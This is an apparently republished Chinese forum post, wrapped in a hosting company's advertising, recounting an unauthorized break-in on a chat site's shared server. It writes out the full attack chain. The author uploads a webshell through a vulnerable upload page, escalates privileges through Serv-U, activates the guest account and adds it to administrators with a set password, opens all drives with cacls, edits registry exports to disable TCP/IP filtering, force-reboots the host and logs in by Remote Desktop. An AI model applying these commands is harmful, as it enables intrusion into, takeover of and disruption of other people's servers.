|
一:得到webshell
今天晚上的一次小小測試����,由于本人太菜�����,再高深的技術我也不會��,只能這樣了..........
一切都已經過去了,沒有辦法補圖了��,希望能看的懂這個小帖子����。
今天有是無聊的一天,晚上實在無聊沒有事情干�����,就到一個視頻聊天站點看秀��,嘿嘿~
突然發現一個聊天室特別的火暴�����,人數已經有500人在里面了(滿員了),刷了n次也沒有進去..........更加郁悶了!:(
想想反正也是沒有事情做,測試一下主機安全做的怎么樣吧,呵呵(太菜��,說測試人家安全實在是抬高自己了)
在cmd下ping了一下得到了對方的ip����,然后登陸http://whois.webhosting.info/對方ip看看有沒有其他的站點,哈,這下發了��,上面有幾十個站點����,估計我還是能找到一個兩個帶漏洞的站點的`
經過漫長的查找,終于找到一個動易帶漏洞的頁面http://www.xxxx.net/Upfile_Soft.asp,上傳一個webshell(海陽2005正式版)先(怎么上傳我就不羅嗦了,上傳工具現在漫天飄了)。
二:成功提升權限建立用戶
拿到webshell后高高興興的登陸了��,突然發現什么權限都沒有�����,只能在自己的webshell所在的目錄里面打轉(c.d.e.f盤都瀏覽不了),連刪除文件的權限都沒有��,郁悶呀........
回到〖Server〗下看看主機開了什么服務吧,經過發現他開了終端服務和serv-u服務,哈��,這下有搞頭了^_^用superscan掃描了一下他的ip��,果然通過banner看出他是用的serv-u����,版本5.0�����。
到〖Wscript.Shell〗下面試試看能執行cmd命令不能��,輸入net user后沒有反映,再試通過Wscript.Shell能執行cmd命令不能,再次輸入net user后執行返回了對方的user名單��,哈哈�����,這下好了�����,能拿下了!�����!
上傳serv-u提升工具到D:\a004\tggtwe\****.com\UploadSoft目錄下面�����,改名為:test.exe,然后回到〖Wscript.Shell〗下執行命令去了��,嘿嘿����,馬上一只肥雞就要到手了,高興ing~
通過Wscript.Shell執行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest /active:yes" #激活guest賬號��,我喜歡用這個賬號
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest lvhuana" #把guest賬號的密碼設定為lvhuana
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net localgroup administrators guest /add" #提升guest權限到admin權限
好了�����,賬號建立完畢�����,執行一下net localgroup administrators看看成功沒,通過回顯知道添加成功了��。然后執行netstat -an后看到他開的終端端口是默認的3389����,OK,連接試試~
三:解決TCP/IP篩選
連接不上�������?暈...........再拿出superscan來掃一下他的3389�����,根本掃不到........(開了防火墻����。靠����,我的點真背.....)
沒有辦法了�����,再次回到Wscript.Shell執行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe c: /e /t /g everyone:F" #把c盤設置為everyone可以瀏覽
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe d: /e /t /g everyone:F" #把d盤設置為everyone可以瀏覽
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe e: /e /t /g everyone:F" #把e盤設置為everyone可以瀏覽
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe f: /e /t /g everyone:F" #把f盤設置為everyone可以瀏覽
這下最少可以遍歷整個硬盤了�����,我在硬盤里面到處的翻,找遍了也沒有找到他的防火墻文件��,這下心里有數了��,肯定是他進行TCP/IP篩選了��。ó斎灰灿惺莾染W做服務器的可能,具體大家自己可以根據ipconfig -all來判斷)
突破TCP/IP篩選我們可以更改他的注冊表來實現�����,我們要做的就是導出他注冊表的三處�����,更改后再導入就可以了��,回到〖Wscript.Shell〗執行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" #導出注冊表里關于TCP/IP篩選的第一處
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" #導出注冊表里關于TCP/IP篩選的第二處
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" #導出注冊表里關于TCP/IP篩選的第三處
然后回到〖Stream〗或〖FSO〗發現1.reg,2.reg,3.reg已經安靜的躺在那里了,嘿嘿~
把1.reg,2.reg,3.reg下載回來到自己的硬盤里面編輯一下��,把關于TCP/IP篩選的幾個地方改一下��,首先打開1.reg找到"EnableSecurityFilters"=dword:00000001把最后面的數字1改成0后保存,然后更改2.reg,3.reg,更改方法一樣,我就不再羅嗦了~
然后我們把1.reg,2.reg,3.reg再上傳回對方的機器里面(這里我們要選上覆蓋模式�����,因為沒有權限刪除原來的1.reg,2.reg,3.reg)��,上傳成功后再回到〖Wscript.Shell〗執行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\1.reg" #安靜模式下把我們修改完的1.reg導入到他的注冊表
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\2.reg" #安靜模式下把我們修改完的2.reg導入到他的注冊表
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\3.reg" #安靜模式下把我們修改完的3.reg導入到他的注冊表
OK��!導入后重新啟動他的機器后在能解決TCP/IP篩選問題,再在〖Wscript.Shell〗執行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "iisreset /reboot /timeout:00" #利用他自身的iis服務來重新啟動他的機器,/timeout:00這個參數是讓他立即重新啟動
執行完后我們再用superscan已經掃不到他了�����,吼吼~已經重新啟動了����!
四:成功用終端登陸
經過漫長的等待后(其實時間不長,只是我在這里已經等不及了,嘿嘿~)����,終于可以用superscan掃到他了�����,并且可以掃到他的3389端口了,哈哈,終于成功了,拿出終端登陸器順利的用我剛才建立的user:guest,pass:lvhuana登陸上了����!
好了��,這篇垃圾文章到此就該結束了,已經凌晨了,也該收工睡覺了~由于本人太菜,錯誤地方肯定在所難免�����,讓大家見笑了��,同時望大家指正!
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【www.laynepeng.cn】
服務器租用/服務器托管中國五強��!虛擬主機域名注冊頂級提供商��!15年品質保障����!--億恩科技[ENKJ.COM]
|
香港服務器租用
美國服務器租用
電信骨干機房
聯通骨干機房
0371-60135900
